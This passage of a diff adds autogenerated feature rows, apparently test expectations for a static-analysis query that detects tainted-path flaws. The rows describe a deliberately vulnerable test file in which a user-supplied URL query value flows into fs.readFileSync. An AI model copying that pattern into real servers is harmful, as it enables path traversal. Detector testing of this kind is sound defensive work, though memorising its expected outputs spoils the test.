readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:21 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:21 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:27 | path.split | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:27 | path.split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:27 | path.split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:27 | path.split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:27 | path.split | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:36 | exceptional return of path.split(unknown) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:36 | exceptional return of path.split(unknown) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:36 | exceptional return of path.split(unknown) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:36 | exceptional return of path.split(unknown) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:36 | exceptional return of path.split(unknown) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:36 | path.split(unknown) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:36 | path.split(unknown) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:36 | path.split(unknown) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:36 | path.split(unknown) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:36 | path.split(unknown) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:39 | path.sp ... own)[i] | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:39 | path.sp ... own)[i] | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:39 | path.sp ... own)[i] | calleeImports | fs | @@ -11511,6 +87985,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:39 | path.sp ... own)[i] | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:39 | path.sp ... own)[i] | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:39 | path.sp ... own)[i] | receiverName | fs | +| autogenerated/TaintedPath/tainted-string-steps.js:25:23:25:27 | split | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:25:23:25:27 | split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:25:23:25:27 | split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:25:23:25:27 | split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:25:23:25:27 | split | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:25:29:25:35 | unknown | CalleeFlexibleAccessPath | path.split | | autogenerated/TaintedPath/tainted-string-steps.js:25:29:25:35 | unknown | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:25:29:25:35 | unknown | calleeImports | url | @@ -11520,6 +87999,56 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:25:29:25:35 | unknown | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:25:29:25:35 | unknown | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:25:29:25:35 | unknown | receiverName | path | +| autogenerated/TaintedPath/tainted-string-steps.js:25:38:25:38 | i | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:25:38:25:38 | i | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:25:38:25:38 | i | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:25:38:25:38 | i | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:25:38:25:38 | i | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:3 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:3 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:3 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:16 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:16 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:16 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:16 | fs.readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:46 | exceptional return of fs.read ... atever) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:46 | exceptional return of fs.read ... atever) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:46 | exceptional return of fs.read ... atever) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:46 | exceptional return of fs.read ... atever) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:46 | exceptional return of fs.read ... atever) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:46 | fs.read ... atever) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:46 | fs.read ... atever) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:46 | fs.read ... atever) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:46 | fs.read ... atever) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:26:2:26:46 | fs.read ... atever) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:26:5:26:16 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:26:5:26:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:26:5:26:16 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:26:5:26:16 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:26:5:26:16 | readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:21 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:21 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:21 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:21 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:21 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:27 | path.split | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:27 | path.split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:27 | path.split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:27 | path.split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:27 | path.split | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:36 | exceptional return of path.split(unknown) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:36 | exceptional return of path.split(unknown) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:36 | exceptional return of path.split(unknown) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:36 | exceptional return of path.split(unknown) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:36 | exceptional return of path.split(unknown) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:36 | path.split(unknown) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:36 | path.split(unknown) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:36 | path.split(unknown) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:36 | path.split(unknown) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:36 | path.split(unknown) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | calleeImports | fs | @@ -11529,6 +88058,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | receiverName | fs | +| autogenerated/TaintedPath/tainted-string-steps.js:26:23:26:27 | split | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:26:23:26:27 | split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:26:23:26:27 | split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:26:23:26:27 | split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:26:23:26:27 | split | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:26:29:26:35 | unknown | CalleeFlexibleAccessPath | path.split | | autogenerated/TaintedPath/tainted-string-steps.js:26:29:26:35 | unknown | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:26:29:26:35 | unknown | calleeImports | url | @@ -11538,6 +88072,51 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:26:29:26:35 | unknown | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:26:29:26:35 | unknown | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:26:29:26:35 | unknown | receiverName | path | +| autogenerated/TaintedPath/tainted-string-steps.js:26:38:26:45 | whatever | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:26:38:26:45 | whatever | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:26:38:26:45 | whatever | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:26:38:26:45 | whatever | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:26:38:26:45 | whatever | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:3 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:3 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:3 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:16 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:16 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:16 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:16 | fs.readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:37 | exceptional return of fs.read ... known)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:37 | exceptional return of fs.read ... known)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:37 | exceptional return of fs.read ... known)) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:37 | exceptional return of fs.read ... known)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:37 | exceptional return of fs.read ... known)) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:37 | fs.read ... known)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:37 | fs.read ... known)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:37 | fs.read ... known)) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:37 | fs.read ... known)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:27:2:27:37 | fs.read ... known)) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:27:5:27:16 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:27:5:27:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:27:5:27:16 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:27:5:27:16 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:27:5:27:16 | readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:21 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:21 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:21 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:21 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:21 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:27 | path.split | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:27 | path.split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:27 | path.split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:27 | path.split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:27 | path.split | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:36 | exceptional return of path.split(unknown) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:36 | exceptional return of path.split(unknown) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:36 | exceptional return of path.split(unknown) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:36 | exceptional return of path.split(unknown) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:36 | exceptional return of path.split(unknown) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:36 | path.split(unknown) | CalleeFlexibleAccessPath | fs.readFileSync | | 